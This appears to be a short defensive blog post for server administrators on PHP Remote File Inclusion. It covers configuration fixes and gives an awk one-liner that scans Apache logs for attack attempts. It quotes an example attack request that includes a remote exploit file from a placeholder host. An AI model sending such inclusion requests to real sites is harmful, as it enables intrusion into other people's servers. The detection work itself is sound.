Picture this – Your server is running fine all these days. Low load. Low bandwidth. Happy Customers. And the next day, everything goes haywire. High bandwidth being reported by NOC. Customers’ website getting hacked. You start receiving emails complaining about port scans being executed from your server. You get frustrated by all these.
This is the situation when Remote File Inclusion vulnerability gets exploited on your server. The cause can be PHP misconfiguration or vulnerabilities in your customers’ sites.
PHP misconfiguration is easy to fix. Merely, turning register_globals, allow_url_fopen, allow_url_include to OFF will prevent it from happening again. But, still PHP configurations can be changed locally by cusotomers, which will be difficult to refrain them from doing. How can you find the sites which are exposed to Remote File Inclusion vulnerability? One method is to check the access log of your webserver. If you are running apache, checking for patterns like “GET /index.php?page=http://www.xxx.com/exploit.txt” will indicate that someone is trying to hack into your website.
This bash one liner will give a listing of possible RIF attacks
awk ‘$7 ~ /?/ && $7 ~ /http/ {print $0 }’ /path/to/apache/access/log
Conclusion
File Inclusion vulnerability will be around for some more time. Configuring your server to prevent it, is the only way. With register_globals removed from PHP6, situation has started to look good already.
More information on RFI can be found at